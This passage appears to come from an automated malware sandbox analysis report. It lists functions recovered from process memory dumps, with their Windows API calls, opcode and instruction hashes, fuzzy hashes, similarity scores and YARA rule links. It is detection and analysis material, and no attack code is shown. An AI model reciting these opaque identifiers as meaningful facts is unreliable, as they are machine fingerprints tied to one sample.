                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1029625771-0
                                                                                                                    • Opcode ID: 388677fd8adca647d7ab458a33e5d7190e7957910009314dde01cedad4541a85
                                                                                                                    • Instruction ID: 066511f3bfbe6abb5dc42b97d9863855139ea6d4ee969021a06b689eeba574f2
                                                                                                                    • Opcode Fuzzy Hash: 388677fd8adca647d7ab458a33e5d7190e7957910009314dde01cedad4541a85
                                                                                                                    • Instruction Fuzzy Hash: 6F1147B18046099FDB14CF9AC448BDEFBF4EB48314F04842AE419A7200C375A545CFA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 011EBF69, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011EBDC9,00000800,00000000,00000000), ref: 011EBFDA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.566010548.00000000011E0000.00000040.00000001.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1029625771-0
                                                                                                                    • Opcode ID: 6d164c431c579e2a69c7e7f82df8ee9ad7ff072e68d2ced0387cde1da24f9755
                                                                                                                    • Instruction ID: 489e0c18d1fbbcc3e4a8db1ccbf8d61db201c725ab89ce525b3a05954ffcf5c6
                                                                                                                    • Opcode Fuzzy Hash: 6d164c431c579e2a69c7e7f82df8ee9ad7ff072e68d2ced0387cde1da24f9755
                                                                                                                    • Instruction Fuzzy Hash: A61114B69002098FDB14CF9AC548BDEFBF4AF48314F14842AD419B7610C375A545CFA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 011EAF9C, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,011EBB1B), ref: 011EBD4E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.566010548.00000000011E0000.00000040.00000001.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: b2cd83a6d901f6f0cd374014b9f34aabb31db69b4be25eb9e0aaa05841a6695a
                                                                                                                    • Instruction ID: 320b9852d1bfad4edfb1af9ee4d0d0296ea43b96ea3af65e01e304e1b574bc64
                                                                                                                    • Opcode Fuzzy Hash: b2cd83a6d901f6f0cd374014b9f34aabb31db69b4be25eb9e0aaa05841a6695a
                                                                                                                    • Instruction Fuzzy Hash: 521102B1C047099FDB14CF9AC548BDEFBF8FB48228F14842AD829A7610D375A546CFA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0115D4D8, Relevance: .1, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.564920623.000000000115D000.00000040.00000001.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c4ac3bd126775e98fe096b3010734d3f420dea6bd99aa0b25c7c2ac59ddd142a
                                                                                                                    • Instruction ID: ffdd4257d777bb440ff2d5e8801ac419fabb170be3057b2f30727b39b5ac3e78
                                                                                                                    • Opcode Fuzzy Hash: c4ac3bd126775e98fe096b3010734d3f420dea6bd99aa0b25c7c2ac59ddd142a
                                                                                                                    • Instruction Fuzzy Hash: 9F210371504204DFDF49CF94E9C4B66BBB9FB8832CF248969EC050B256C336D856CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0116D1D4, Relevance: .1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.565211229.000000000116D000.00000040.00000001.sdmp, Offset: 0116D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bc3bfd93927a0c419217d251b630e8b293f3347cf10978243e4eb979535a8096
                                                                                                                    • Instruction ID: a254dee344ee1819ccfd0d459e27504579e26fbe83d8c9e0a4ed562e8c6ecc76
                                                                                                                    • Opcode Fuzzy Hash: bc3bfd93927a0c419217d251b630e8b293f3347cf10978243e4eb979535a8096
                                                                                                                    • Instruction Fuzzy Hash: 3121F871604244DFDF09CF94E9C4B26BB69FB84324F24C96DE8494B242C337D856CA62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0116D01C, Relevance: .1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.565211229.000000000116D000.00000040.00000001.sdmp, Offset: 0116D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 44343882e0f6f79b65460b7fed7c202b4be689c2b999f1f894e305ca0bf44118
                                                                                                                    • Instruction ID: 8fc7fa82327ad8540f794ab12fc908ba01199066e4eecc7898a2925a3b74605c
                                                                                                                    • Opcode Fuzzy Hash: 44343882e0f6f79b65460b7fed7c202b4be689c2b999f1f894e305ca0bf44118
                                                                                                                    • Instruction Fuzzy Hash: B1210371604244DFDF19CF94E9C4B26BB69FB88254F24C969E8890B246C337D816CA62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0116D006, Relevance: .1, Instructions: 62COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.565211229.000000000116D000.00000040.00000001.sdmp, Offset: 0116D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2285737582f954d6cd7c309a48e9ada11bf9d413cc9497824d1e45546e1de48f
                                                                                                                    • Instruction ID: 5a1f2e23967e0f7c1fbc7d4d5577bda87987a0f7d06cd0b59bfdf44b67da569a
                                                                                                                    • Opcode Fuzzy Hash: 2285737582f954d6cd7c309a48e9ada11bf9d413cc9497824d1e45546e1de48f
                                                                                                                    • Instruction Fuzzy Hash: BB2180755093808FDB06CF24D990B15BF71EB46214F28C5DAD8898B6A7C33BD81ACB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0115D4D3, Relevance: .1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.564920623.000000000115D000.00000040.00000001.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 24eb97f53dfc2f758aae7806af3b9c969fc9a1f1250e6544b53e35aad7901afb
                                                                                                                    • Instruction ID: fff2bffd3c6ce7bccfcf5791f8a357d0ae7dc151555daba134e4a5a8118a1cc1
                                                                                                                    • Opcode Fuzzy Hash: 24eb97f53dfc2f758aae7806af3b9c969fc9a1f1250e6544b53e35aad7901afb
                                                                                                                    • Instruction Fuzzy Hash: A911D376404280CFDF16CF54D9C4B16BF71FB84328F2486A9DD090B656C33AD45ACBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0116D1CF, Relevance: .1, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.565211229.000000000116D000.00000040.00000001.sdmp, Offset: 0116D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 16abbeb9ba4f4dfb3705fde0490ff83ff0d60445e332c202b3081b1844091605
                                                                                                                    • Instruction ID: 141e75f280069f9a7673c25cce3955b455708b51a56c5cc6f2aca8dbe48df944
                                                                                                                    • Opcode Fuzzy Hash: 16abbeb9ba4f4dfb3705fde0490ff83ff0d60445e332c202b3081b1844091605
                                                                                                                    • Instruction Fuzzy Hash: 1811BB75604280DFDF16CF54D5C0B15BBA1FB84224F28C6ADD8894B696C33BD45ACB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0115D749, Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.564920623.000000000115D000.00000040.00000001.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7c35ea60489aac0dce0b19d077dcad6c9db5407bb37a69e0e45e1b75215efd72
                                                                                                                    • Instruction ID: 54a8d6f63c06bfc3ca5b9b3670f2c9baaf2cf69ff4e23e150dc59f4f3d3beee2
                                                                                                                    • Opcode Fuzzy Hash: 7c35ea60489aac0dce0b19d077dcad6c9db5407bb37a69e0e45e1b75215efd72
                                                                                                                    • Instruction Fuzzy Hash: A701FC71004784DAEB584A95ED847A6FBDCEF41238F088555ED241A242D3749444C7B2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0115D6E7, Relevance: .0, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.564920623.000000000115D000.00000040.00000001.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c78ca95f83071715847bdfff6ee00744d32796afa128d0d8db172d350175adec
                                                                                                                    • Instruction ID: 7806ea0cd1fd22872460dd14139505604b7d483012aea6f4be2061ba322637ee
                                                                                                                    • Opcode Fuzzy Hash: c78ca95f83071715847bdfff6ee00744d32796afa128d0d8db172d350175adec
                                                                                                                    • Instruction Fuzzy Hash: 5FF04976200A00AF97648F0AD984C23FBBEEBC4774715C55AEC4A4B712C771EC42CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0115D748, Relevance: .0, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.564920623.000000000115D000.00000040.00000001.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a161735487b1d46089fb74cfb8daa20308acaba4d7e6734e608a91e18c3f4458
                                                                                                                    • Instruction ID: 21d6ec738e3f07c2767a25bee1c1071f82d2ea40f60834ad83b6b7e1bee973bd
                                                                                                                    • Opcode Fuzzy Hash: a161735487b1d46089fb74cfb8daa20308acaba4d7e6734e608a91e18c3f4458
                                                                                                                    • Instruction Fuzzy Hash: CAF0C271404784EEEB248A49DC84B62FFACEB41638F18C45AED181B282C3B99844CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0115D6D8, Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000028.00000002.564920623.000000000115D000.00000040.00000001.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8879052d86c47536e0a64d18d893b250d104d873aa2b9df6e29047dcfd80f921
                                                                                                                    • Instruction ID: 98d827d2dd416665be47ca649d5974dfa3d2cef4b11df2740cbd5ff90b625358
                                                                                                                    • Opcode Fuzzy Hash: 8879052d86c47536e0a64d18d893b250d104d873aa2b9df6e29047dcfd80f921
                                                                                                                    • Instruction Fuzzy Hash: BFF03C75104A80AFD7658F55C984C22BFB9EB8A6647198489E8954B722C670FC42CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions